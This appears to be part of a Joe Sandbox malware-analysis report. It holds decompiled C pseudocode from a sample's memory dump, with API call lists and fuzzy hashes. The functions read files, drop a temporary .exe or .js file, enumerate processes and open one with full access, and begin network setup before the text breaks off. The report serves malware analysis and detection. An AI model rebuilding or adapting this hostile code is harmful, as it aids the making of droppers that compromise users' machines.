0x006f752d
0x006f7536
0x006f753b
0x006f751e
0x006f750a
0x006f74fb
0x006f74e3
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006F74C8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006F74DA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F74ED
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006F7516
CloseHandle.KERNEL32(00000000), ref: 006F7521

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

CloseHandle.KERNEL32(00000000), ref: 006F754A

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$CloseHandlePointer$CreateFreeHeapRead
String ID:
API String ID: 3957287750-0
Opcode ID: d6d8efed4a75ffb26dc6a43aae416f68440588fe59fdcc36e8332d0fc107e92e
Instruction ID: db2dd06958ec1639b873d59aee0b5c020d13c8cd3438f311da7f46e57198ccc3
Opcode Fuzzy Hash: d6d8efed4a75ffb26dc6a43aae416f68440588fe59fdcc36e8332d0fc107e92e
Instruction Fuzzy Hash: EA31D4B1108204A6E3305B25EC49FFB76EEEFC1718F24412CF74996291EB359D06C2AA

Uniqueness

Uniqueness Score: -1.00%

Function 006EFA90, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 329
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E006EFA90(short* __ecx, void* __eflags, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				WCHAR* _v0;
				WCHAR* _v8;
				char _v220;
				int _v224;
				short _v228;
				WCHAR* _v236;
				char _v240;
				signed int _v244;
				WCHAR* _v248;
				intOrPtr _v252;
				WCHAR* _v256;
				short _v260;
				char _v264;
				short* _v268;
				short* _v272;
				short* _v276;
				short* _v280;
				WCHAR* _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _t107;
				WCHAR* _t108;
				WCHAR* _t116;
				WCHAR* _t123;
				WCHAR* _t124;
				intOrPtr _t125;
				WCHAR* _t127;
				intOrPtr _t128;
				WCHAR* _t131;
				intOrPtr _t132;
				WCHAR* _t134;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t137;
				WCHAR* _t140;
				WCHAR* _t141;
				intOrPtr _t142;
				WCHAR* _t147;
				WCHAR* _t149;
				signed int _t152;
				intOrPtr _t154;
				signed int _t155;
				signed int _t159;
				WCHAR* _t163;
				WCHAR* _t164;
				WCHAR* _t165;
				WCHAR* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				signed int _t170;
				short* _t172;
				char* _t173;
				WCHAR* _t174;
				signed int _t178;
				intOrPtr _t181;
				signed int _t182;
				short* _t184;
				WCHAR* _t186;
				WCHAR* _t187;
				short* _t189;
				intOrPtr _t190;
				WCHAR* _t194;
				WCHAR* _t195;
				signed int _t196;
				short** _t200;

				_t195 = _a8;
				_t189 = __ecx;
				E006F6610( &_v284, 0, 0x10c);
				_t200 =  &(( &_v280)[3]);
				_t107 =  *0x6f9b0c; // 0x2ef350
				 *(_t107 + 8) = 6;
				_t4 = _t107 + 0x24; // 0x0
				_t168 =  *_t4;
				if(_t168 == 0) {
					L32:
					 *(_t107 + 8) = 2;
					goto L33;
				} else {
					_t152 = 0xfffffffe;
					_t149 = 1;
					while( *((short*)(_t168 + _t149 * 2 - 2)) != 0) {
						_t149 =  &(_t149[0]);
						_t152 = _t152 + 0xfffffffe;
						if(_t149 != 0x80000000) {
							continue;
						} else {
							_v252 = 0;
							_v248 = 0x80070057;
							goto L32;
						}
					}
					_t10 = _t149 - 1; // 0x0
					_t181 = _t10;
					_v252 = _t181;
					_v248 = 0;
					_t123 = E006E3180( ~_t152, 0);
					_t200 =  &(_t200[2]);
					_t169 =  *0x6f9b0c; // 0x2ef350
					__eflags = _t123;
					_v284 = _t123;
					if(_t123 == 0) {
						 *(_t169 + 8) = 6;
						L33:
						if(_v220 == 0) {
							_t108 = _v256;
							__eflags = _t108;
							if(_t108 != 0) {
								E006E91E0(_t108);
								_t200 =  &(_t200[1]);
							}
							__eflags = _t195;
							if(_t195 != 0) {
								_t116 = _v0;
								__eflags = _t116;
								if(_t116 != 0) {
									DeleteFileW(_t116);
									E006E91E0(_v0);
									_t200 =  &(_t200[1]);
									_v0 = 0;
								}
							}
						} else {
							if(_t195 != 0) {
								_t120 = _v256;
								if(_v256 != 0) {
									E006E91E0(_t120);
									_t200 =  &(_t200[1]);
								}
							}
						}
						_t109 = _v260;
						if(_v260 != 0) {
							E006E91E0(_t109);
							_t200 =  &(_t200[1]);
						}
						_t110 = _v284;
						if(_v284 != 0) {
							E006E91E0(_t110);
							_t200 =  &(_t200[1]);
						}
						_t111 = _v276;
						if(_v276 != 0) {
							E006E91E0(_t111);
						}
						return _v220;
					}
					__eflags = _t149;
					if(__eflags <= 0) {
						_t154 = 0x80070057;
						if(__eflags != 0) {
							 *_t123 = 0;
						}
						L16:
						_v248 = _t154;
						 *(_t169 + 8) = 2;
						goto L33;
					} else {
						 *_t200 = _t189;
						_t14 = _t169 + 0x24; // 0x0
						_t190 =  *_t14;
						_v288 = _t181;
						_v292 = _t169;
						_t182 = 2;
						_t170 = 0;
						_t155 = 0;
						__eflags = 0;
						while(1) {
							_t196 =  *(_t190 + _t155 * 2) & 0x0000ffff;
							__eflags = _t196;
							if(_t196 == 0) {
								break;
							}
							_t123[_t155] = _t196;
							_t182 = _t182 + 0xfffffffe;
							_t170 = _t170 + 0xfffffffe;
							__eflags = _t149 - 1;
							_t149 = _t149 - 1;
							if(__eflags == 0) {
								L11:
								__eflags = _t149;
								_t180 =  ==  ?  ~_t182 :  ~_t170;
								 *((short*)(_t123 + ( ==  ?  ~_t182 :  ~_t170))) = 0;
								if(_t149 != 0) {
									L18:
									 *((intOrPtr*)( &_v240 - 8)) = 0;
									_t184 =  &(( *_t200)[6]);
									_t124 = E006F08A0(_t123, _t123, _v288,  &_v276,  &_v240);
									_t195 = _v8;
									__eflags = _t124;
									if(_t124 == 0) {
										L31:
										_t107 =  *0x6f9b0c; // 0x2ef350
										goto L32;
									}
									_t125 = _v240;
									__eflags = _t125 - 0x23;
									if(_t125 <= 0x23) {
										goto L31;
									}
									_t172 = _v276;
									 *_t200 = _t184;
									_v228 =  *_t172;
									_v268 =  &(_t172[2]);
									_t159 = _t172[0x12];
									_v244 = _t159;
									_v280 =  &(_t172[0x14]);
									_t193 = _t172 + 0x28 + _t159 * 2;
									_t186 = _t125 - 0x28 - _t159 + _t159;
									__eflags = _t159;
									_v264 = _t172 + 0x28 + _t159 * 2;
									_v236 = _t186;
									_v272 = _t172;
									if(_t159 == 0) {
										goto L31;
									}
									__eflags = _t186;
									if(_t186 == 0) {
										goto L31;
									}
									_push(_t186);
									_t127 = E006EB250(_t172, _t125 - _t186, _t193);
									__eflags = _t127;
									if(_t127 == 0) {
										_t128 =  *0x6f9b0c; // 0x2ef350
										 *((intOrPtr*)(_t128 + 8)) = 3;
										goto L33;
									}
									_t187 = _a12;
									__eflags = _t195;
									 *_v268 = 0;
									if(__eflags == 0) {
										L66:
										_push(0xc);
										_push( &_v228);
										_t131 = E006EDCF0(__eflags,  *((intOrPtr*)( &_v260 - 0x18)),  &_v260);
										_t200 =  &(_t200[4]);
										__eflags = _t131;
										if(_t131 == 0) {
											_t132 =  *0x6f9b0c; // 0x2ef350
											 *((intOrPtr*)(_t132 + 8)) = 4;
											goto L33;
										}
										_t173 =  &_v264;
										_push(0x800c);
										_push( &_v236);
										_push(_t173);
										_push( *((intOrPtr*)(_t173 + 0x24)));
										_push( *((intOrPtr*)(_t173 + 4)));
										_t134 = E006EF800();
										__eflags = _t134;
										if(_t134 == 0) {
											L70:
											_t135 =  *0x6f9b0c; // 0x2ef350
											 *((intOrPtr*)(_t135 + 8)) = 5;
											goto L33;
										}
										__eflags = _v236 - 0x20;
										if(_v236 != 0x20) {
											goto L70;
										}
										_t136 = E006F7D20(_v264, _v272, 0x20);
										_t200 =  &(_t200[3]);
										__eflags = _t136;
										if(_t136 == 0) {
											__eflags = _t195;
											if(_t195 == 0) {
												_t163 = _a8;
												__eflags = _t163;
												if(_t163 == 0) {
													L79:
													__eflags = _v224;
													if(_v224 != 0) {
														_t137 =  *0x6f9b0c; // 0x2ef350
														 *(_t137 + 8) = 1;
													}
													goto L33;
												}
												__eflags = _t187;
												 *_t163 = _v260;
												if(_t187 == 0) {
													goto L79;
												}
												 *_t187 = _v228;
												L78:
												_v224 = 1;
												goto L79;
											}
											_t140 = E006E6270(_t136, _v0, _v260, _v228);
											_t200 =  &(_t200[3]);
											__eflags = _t140;
											if(_t140 != 0) {
												goto L78;
											}
											goto L33;
										}
										goto L70;
									}
									_t141 = E006E3180(0x20a, 0);
									_t200 =  &(_t200[2]);
									__eflags = _t141;
									_v0 = _t141;
									if(_t141 == 0) {
										_t142 =  *0x6f9b0c; // 0x2ef350
										 *(_t142 + 8) = 6;
										goto L33;
									}
									__eflags = _v0;
									if(_v0 == 0) {
										L30:
										GetTempPathW(0x104, _t141);
										_t194 =  &_v220;
										E006F4520(_t194, 0x7c);
										_t200 =  &(_t200[2]);
										GetTempFileNameW(_v0, _t194, 1, _v0);
										_t141 = _v0;
										L52:
										_t174 = 0;
										__eflags = 0;
										_t164 = _t141;
										while(1) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												break;
											}
											_t174 = _t174 + 1;
											_t164 =  &(_t164[1]);
											__eflags = _t174 - 0x103;
											if(_t174 <= 0x103) {
												continue;
											}
											break;
										}
										__eflags = _t164 - _t141;
										if(__eflags <= 0) {
											goto L66;
										}
										_t165 =  &(_t164[2]);
										__eflags = _t165;
										while(1) {
											__eflags = ( *(_t165 - 4) & 0x0000ffff) - 0x2e;
											if(( *(_t165 - 4) & 0x0000ffff) == 0x2e) {
												break;
											}
											_t79 = _t165 - 2; // -8
											__eflags =  &(_t165[0xfffffffffffffffd]) - _t141;
											_t165 = _t79;
											if(__eflags > 0) {
												continue;
											}
											goto L66;
										}
										_t147 = _a16;
										__eflags = _t147;
										if(__eflags == 0) {
											 *(_t165 - 2) = 0x780065;
											_t165[1] = 0x65;
											_t165 =  &(_t165[1]);
										} else {
											__eflags = _t147 - 1;
											if(__eflags != 0) {
												_t165 =  &(_t165[0xffffffffffffffff]);
												__eflags = _t165;
											} else {
												 *(_t165 - 2) = 0x73006a;
											}
										}
										_t165[1] = 0;
										goto L66;
									}
									_t167 = 0xfffffdf8;
									while(1) {
										_t178 =  *(_v0 +  &(_t167[0x104])) & 0x0000ffff;
										__eflags = _t178;
										if(_t178 == 0) {
											break;
										}
										 *(_t141 +  &(_t167[0x104])) = _t178;
										_t167 =  &(_t167[1]);
										__eflags = _t167;
										if(_t167 != 0) {
											continue;
										}
										 *((short*)(_t141 +  &(_t167[0x103]))) = 0;
										_v252 = 0x8007007a;
										goto L30;
									}
									 *(_t141 +  &(_t167[0x104])) = 0;
									_v252 = 0;
									goto L52;
								} else {
									_t195 = _a8;
									_t169 = _v292;
									_t154 = 0x8007007a;
									goto L16;
								}
							}
							__eflags = _t155 - 0x7ffffffd;
							_t155 = _t155 + 1;
							if(__eflags != 0) {
								continue;
							}
							goto L11;
						}
						_t123[_t155] = 0;
						goto L18;
					}
				}
			}

0x006efa9a
0x006efaa1
0x006efaaf
0x006efab4
0x006efab7
0x006efabc
0x006efac3
0x006efac3
0x006efac8
0x006efd07
0x006efd07
0x00000000
0x006eface
0x006efad0
0x006efad5
0x006efad6
0x006efade
0x006efadf
0x006efae8
0x00000000
0x006efaea
0x006efaea
0x006efaf2
0x00000000
0x006efaf2
0x006efae8
0x006efaff
0x006efaff
0x006efb06
0x006efb0a
0x006efb10
0x006efb15
0x006efb18
0x006efb1e
0x006efb20
0x006efb24
0x006efb8c
0x006efd0e
0x006efd13
0x006efd2c
0x006efd30
0x006efd32
0x006efd35
0x006efd3a
0x006efd3a
0x006efd3d
0x006efd3f
0x006efd41
0x006efd44
0x006efd46
0x006efd49
0x006efd52
0x006efd57
0x006efd5a
0x006efd5a
0x006efd46
0x006efd15
0x006efd17
0x006efd19
0x006efd1f
0x006efd22
0x006efd27
0x006efd27
0x006efd1f
0x006efd17
0x006efd61
0x006efd67
0x006efd6a
0x006efd6f
0x006efd6f
0x006efd72
0x006efd78
0x006efd7b
0x006efd80
0x006efd80
0x006efd83
0x006efd89
0x006efd8c
0x006efd91
0x006efda2
0x006efda2
0x006efb26
0x006efb28
0x006efb98
0x006efb9d
0x006efb9f
0x006efb9f
0x006efba4
0x006efba4
0x006efba8
0x00000000
0x006efb2a
0x006efb2a
0x006efb2d
0x006efb2d
0x006efb30
0x006efb34
0x006efb38
0x006efb3d
0x006efb3f
0x006efb3f
0x006efb41
0x006efb41
0x006efb45
0x006efb48
0x00000000
0x00000000
0x006efb4a
0x006efb4e
0x006efb51
0x006efb57
0x006efb59
0x006efb5c
0x006efb69
0x006efb6d
0x006efb6f
0x006efb72
0x006efb78
0x006efbba
0x006efbc5
0x006efbcc
0x006efbd8
0x006efbdd
0x006efbe4
0x006efbe6
0x006efd02
0x006efd02
0x00000000
0x006efd02
0x006efbec
0x006efbf0
0x006efbf3
0x00000000
0x00000000
0x006efbf9
0x006efbfd
0x006efc08
0x006efc0f
0x006efc13
0x006efc19
0x006efc1d
0x006efc21
0x006efc25
0x006efc27
0x006efc29
0x006efc2d
0x006efc31
0x006efc35
0x00000000
0x00000000
0x006efc3b
0x006efc3d
0x00000000
0x00000000
0x006efc48
0x006efc4c
0x006efc51
0x006efc53
0x006efda5
0x006efdaa
0x00000000
0x006efdaa
0x006efc5d
0x006efc64
0x006efc66
0x006efc6b
0x006efe41
0x006efe49
0x006efe4b
0x006efe50
0x006efe55
0x006efe58
0x006efe5a
0x006efeab
0x006efeb0
0x00000000
0x006efeb0
0x006efe63
0x006efe67
0x006efe6c
0x006efe6d
0x006efe6e
0x006efe71
0x006efe74
0x006efe79
0x006efe7b
0x006efe9a
0x006efe9a
0x006efe9f
0x00000000
0x006efe9f
0x006efe7d
0x006efe82
0x00000000
0x00000000
0x006efe8e
0x006efe93
0x006efe96
0x006efe98
0x006efebc
0x006efebe
0x006efedc
0x006efee3
0x006efee5
0x006efeff
0x006efeff
0x006eff04
0x006eff0a
0x006eff0f
0x006eff0f
0x00000000
0x006eff04
0x006efeeb
0x006efeed
0x006efeef
0x00000000
0x00000000
0x006efef5
0x006efef7
0x006efef7
0x00000000
0x006efef7
0x006efecb
0x006efed0
0x006efed3
0x006efed5
0x00000000
0x00000000
0x00000000
0x006efed7
0x00000000
0x006efe98
0x006efc78
0x006efc7d
0x006efc80
0x006efc82
0x006efc85
0x006efdb6
0x006efdbb
0x00000000
0x006efdbb
0x006efc8b
0x006efc93
0x006efcd1
0x006efcd7
0x006efcdd
0x006efce4
0x006efce9
0x006efcf4
0x006efcfa
0x006efdd9
0x006efdd9
0x006efdd9
0x006efddb
0x006efddd
0x006efddd
0x006efde1
0x00000000
0x00000000
0x006efde3
0x006efde4
0x006efde7
0x006efded
0x00000000
0x00000000
0x00000000
0x006efded
0x006efdef
0x006efdf1
0x00000000
0x00000000
0x006efdf3
0x006efdf3
0x006efdf6
0x006efdfa
0x006efdfd
0x00000000
0x00000000
0x006efdff
0x006efe05
0x006efe07
0x006efe09
0x00000000
0x00000000
0x00000000
0x006efe0b
0x006efe0d
0x006efe14
0x006efe16
0x006efe26
0x006efe2d
0x006efe33
0x006efe18
0x006efe18
0x006efe1b
0x006efe38
0x006efe38
0x006efe1d
0x006efe1d
0x006efe1d
0x006efe1b
0x006efe3b
0x00000000
0x006efe3b
0x006efc95
0x006efc9a
0x006efca1
0x006efca9
0x006efcac
0x00000000
0x00000000
0x006efcb2
0x006efcba
0x006efcba
0x006efcbd
0x00000000
0x00000000
0x006efcbf
0x006efcc9
0x00000000
0x006efcc9
0x006efdc7
0x006efdd1
0x00000000
0x006efb7a
0x006efb7a
0x006efb81
0x006efb85
0x00000000
0x006efb85
0x006efb78
0x006efb5e
0x006efb64
0x006efb67
0x00000000
0x00000000
0x00000000
0x006efb67
0x006efbb4
0x00000000
0x006efbb4
0x006efb28

APIs

DeleteFileW.KERNEL32(?), ref: 006EFD49

Strings

, xrefs: 006EFE7D
z, xrefs: 006EFCC9

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: DeleteFile
String ID: $z
API String ID: 4033686569-2251613814
Opcode ID: e62ce916766a1595f7791dd499e69e6b50ac4395be25867f1a76e99a1fcd9275
Instruction ID: 43ab49c6f9fa8dc1eeeb81a1cb8f20ff3dca93372125b9252020c25e9e3fd99b
Opcode Fuzzy Hash: e62ce916766a1595f7791dd499e69e6b50ac4395be25867f1a76e99a1fcd9275
Instruction Fuzzy Hash: 31C1AFB16053819BDB20CF16DC48BABBBE6EF84304F14862DF9498B3A1E771D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006EC510, Relevance: 9.1, APIs: 6, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006EC510(void* __eax, void* __ecx) {
				void* _t7;
				long _t9;
				void* _t13;
				void* _t22;
				long _t23;
				long _t25;
				DWORD* _t26;

				_t23 = 0;
				 *_t26 = 0;
				_t7 = CreateFileW(_t26[6], 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t7 != 0xffffffff) {
					_t22 = _t7;
					_t23 = 0;
					_t9 = SetFilePointer(_t7, 0, 0, 2);
					if(_t9 == 0xffffffff) {
						L7:
						CloseHandle(_t22);
					} else {
						_t25 = _t9;
						SetFilePointer(_t22, 0, 0, 0);
						_t2 = _t25 - 1; // -1
						if(_t2 > 0xffffe) {
							goto L7;
						} else {
							_t13 = E006E3180(_t25, 0);
							_t26 =  &(_t26[2]);
							if(_t13 == 0) {
								goto L7;
							} else {
								_t20 = _t13;
								if(ReadFile(_t22, _t13, _t25, _t26, 0) == 0) {
									E006E91E0(_t20);
									_t26 =  &(_t26[1]);
									goto L7;
								} else {
									CloseHandle(_t22);
									_t23 = E006EB9F0(_t20, _t26[1], _t26[7]);
									E006E91E0(_t20);
									_t26 =  &(_t26[4]);
								}
							}
						}
					}
				}
				return _t23;
			}

0x006ec519
0x006ec51b
0x006ec52f
0x006ec538
0x006ec53e
0x006ec540
0x006ec547
0x006ec550
0x006ec5ba
0x006ec5bb
0x006ec552
0x006ec552
0x006ec558
0x006ec55e
0x006ec566
0x00000000
0x006ec568
0x006ec56b
0x006ec570
0x006ec575
0x00000000
0x006ec577
0x006ec577
0x006ec589
0x006ec5b2
0x006ec5b7
0x00000000
0x006ec58b
0x006ec590
0x006ec5a4
0x006ec5a7
0x006ec5ac
0x006ec5ac
0x006ec589
0x006ec575
0x006ec566
0x006ec550
0x006ec5ca

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006EC52F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006EC547
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006EC558

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006EC581
CloseHandle.KERNEL32(00000000), ref: 006EC590

Part of subcall function 006EB9F0: CreateFileW.KERNEL32(C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006EBA3B

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

CloseHandle.KERNEL32(00000000), ref: 006EC5BB

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$Heap$CloseCreateHandlePointer$AllocateFreeProcessRead
String ID:
API String ID: 739418787-0
Opcode ID: fe33329b89a31f67c0869d0e8bccd423e9674ef3f06c85033eb5c5b2f56cbd26
Instruction ID: 0fc3eb8fbcc7ffb5043b4bf337f254ec7fb91797f33d5a69f396c33b5cff7f96
Opcode Fuzzy Hash: fe33329b89a31f67c0869d0e8bccd423e9674ef3f06c85033eb5c5b2f56cbd26
Instruction Fuzzy Hash: E11191B25022547BD63016366C8DFBB3E9EDF427B5F140528F90AD6291E621ED16C2F1

Uniqueness

Uniqueness Score: -1.00%

Function 006F0230, Relevance: 9.1, APIs: 6, Instructions: 68
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E006F0230(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t13;
				intOrPtr* _t24;
				intOrPtr* _t25;
				struct _SECURITY_ATTRIBUTES* _t28;
				intOrPtr* _t29;
				void* _t31;

				_t28 = 0;
				_t13 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				if(_t13 != 0xffffffff) {
					_t31 = _t13;
					if(GetFileTime(_t31,  &_v20,  &_v28,  &(_v28.dwHighDateTime)) == 0) {
						_t28 = 0;
					} else {
						_t24 = _a8;
						_t29 = _a12;
						if(_t24 != 0) {
							 *_t24 =  *0x6f9ee4(_v20.dwLowDateTime, _v20.dwHighDateTime, 0x989680, 0) + 0x49ef6f00;
						}
						_t25 = _a16;
						if(_t29 != 0) {
							 *_t29 =  *0x6f9ee4(_v28.dwLowDateTime, _v28.dwHighDateTime.dwLowDateTime, 0x989680, 0) + 0x49ef6f00;
						}
						_t28 = 1;
						if(_t25 != 0) {
							 *_t25 =  *0x6f9ee4(_v36, _v32, 0x989680, 0) + 0x49ef6f00;
						}
					}
					CloseHandle(_t31);
				}
				return _t28;
			}

0x006f0236
0x006f0248
0x006f0251
0x006f0257
0x006f026f
0x006f02e2
0x006f0271
0x006f0271
0x006f0275
0x006f027b
0x006f0297
0x006f0297
0x006f0299
0x006f029f
0x006f02bb
0x006f02bb
0x006f02bf
0x006f02c2
0x006f02de
0x006f02de
0x006f02c2
0x006f02e5
0x006f02e5
0x006f02f3

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006F0248
GetFileTime.KERNEL32(00000000,?,?,?,?,?,006F0385,00000000), ref: 006F0267
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F028C
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02B0
_aulldiv.NTDLL(?,?,00989680,00000000), ref: 006F02D3
CloseHandle.KERNEL32(00000000), ref: 006F02E5

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: _aulldiv$File$CloseCreateHandleTime
String ID:
API String ID: 504125806-0
Opcode ID: b5ab084d53893bf1dcf81fe59742a972a511e0f1d11c3ab828fb4180ad3088e7
Instruction ID: a920377ba5fb31b432dd6c6c4580bdf0da75cf8285a5d76b1aebc387760fbcd5
Opcode Fuzzy Hash: b5ab084d53893bf1dcf81fe59742a972a511e0f1d11c3ab828fb4180ad3088e7
Instruction Fuzzy Hash: 2911B132204342BFE7209F24DC49F6B7BAAEFC4B08F144518F65596294D7708D15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 006E9A60, Relevance: 9.1, APIs: 6, Instructions: 61
processstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006E9A60(intOrPtr __ecx) {
				void** _v0;
				WCHAR* _v4;
				char _v544;
				long _v572;
				char _v576;
				void* _v580;
				void* _t9;
				struct tagPROCESSENTRY32W* _t11;
				void* _t14;
				int _t17;
				WCHAR* _t18;
				intOrPtr _t23;
				WCHAR* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t23 = __ecx;
				_v572 = 0x22c;
				_t9 = CreateToolhelp32Snapshot(2, 0);
				if(_t9 == 0xffffffff) {
					_t17 = 0;
					L10:
					return _t17;
				}
				_t25 = _t9;
				_t11 =  &_v576;
				Process32FirstW(_t25, _t11);
				_t17 = 0;
				if(_t11 != 1) {
					L9:
					CloseHandle(_t25);
					goto L10;
				}
				 *_t27 = _t23;
				_t24 = _v4;
				_t18 =  &_v544;
				while(lstrcmpiW(_t18, _t24) != 0) {
					if(Process32NextW(_t25,  &_v580) == 1) {
						continue;
					}
					_t17 = 0;
					goto L9;
				}
				_t14 = OpenProcess(0x1fffff, 0, _v572);
				_t17 = 0;
				if(_t14 != 0) {
					_t17 = 1;
					 *( *_t27 + 0x78) = 0;
					 *_v0 = _t14;
				}
				goto L9;
			}

0x006e9a6a
0x006e9a6c
0x006e9a78
0x006e9a81
0x006e9ac9
0x006e9b04
0x006e9b10
0x006e9b10
0x006e9a83
0x006e9a85
0x006e9a8b
0x006e9a91
0x006e9a96
0x006e9afd
0x006e9afe
0x00000000
0x006e9afe
0x006e9a98
0x006e9a9b
0x006e9aa8
0x006e9aac
0x006e9ac3
0x00000000
0x00000000
0x006e9ac5
0x00000000
0x006e9ac5
0x006e9ad8
0x006e9ae0
0x006e9ae5
0x006e9af3
0x006e9af4
0x006e9afb
0x006e9afb
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E9A78
Process32FirstW.KERNEL32(00000000,0000022C), ref: 006E9A8B
lstrcmpiW.KERNEL32(?,?), ref: 006E9AAE
Process32NextW.KERNEL32(00000000,0000022C), ref: 006E9ABA
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 006E9AD8
CloseHandle.KERNEL32(00000000), ref: 006E9AFE

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextOpenProcessSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 3301242143-0
Opcode ID: 5aef31cb55af3367d73229be30f417820d1d4c17dc1d040eb369162c3c58fec7
Instruction ID: b4546ad2559a220437a4ae6b1ac3760b6a85a0f35ae772a989068224f4348b72
Opcode Fuzzy Hash: 5aef31cb55af3367d73229be30f417820d1d4c17dc1d040eb369162c3c58fec7
Instruction Fuzzy Hash: 73117031205340AFD3215FA9ECC8BBBBBEAEF85318F244539F6598A290D7749806C771

Uniqueness

Uniqueness Score: -1.00%

Function 006E7A60, Relevance: 7.7, APIs: 5, Instructions: 157
networkCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E006E7A60() {
				intOrPtr _v4;
				char _v416;
				char _v624;
				char _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				char _v868;
				intOrPtr _v884;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t48;
				intOrPtr _t52;
				signed int _t54;
				char _t58;
				unsigned int _t62;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t69;
				char* _t71;

				_t72 =  &_v848;
				_t58 = 0;
				_v860 = 0;
				_v864 = 0;
				_push( &_v416);
				_push(0x202);
				if( *0x6f9eac() != 0) {
					L31:
					_t32 = _v868;
					if(_v868 != 0) {
						E006E91E0(_t32);
					}
					 *0x6f9eb4();
					return _t58;
				}
				_t36 = E006E3180(0x100, 0);
				_t72 =  &_v848 + 8;
				_t69 = _t36;
				if(_t36 == 0) {
					L26:
					_t58 = 0;
					_t67 = 0;
					L27:
					if(_t69 != 0) {
						E006E91E0(_t69);
						_t72 = _t72 + 4;
					}
					if(_t67 != 0) {
						E006E91E0(_t67);
						_t72 = _t72 + 4;
					}
					goto L31;
				}
				_t39 = E006EA3C0(_v4);
				if(_t39 == 0) {
					goto L26;
				}
				_v864 = _t39;
				_t40 = 0;
				_t68 = 0;
				_v860 = _t69;
				L4:
				L4:
				if(_t40 != 0) {
					E006E91E0(_t40);
					_t72 = _t72 + 4;
				}
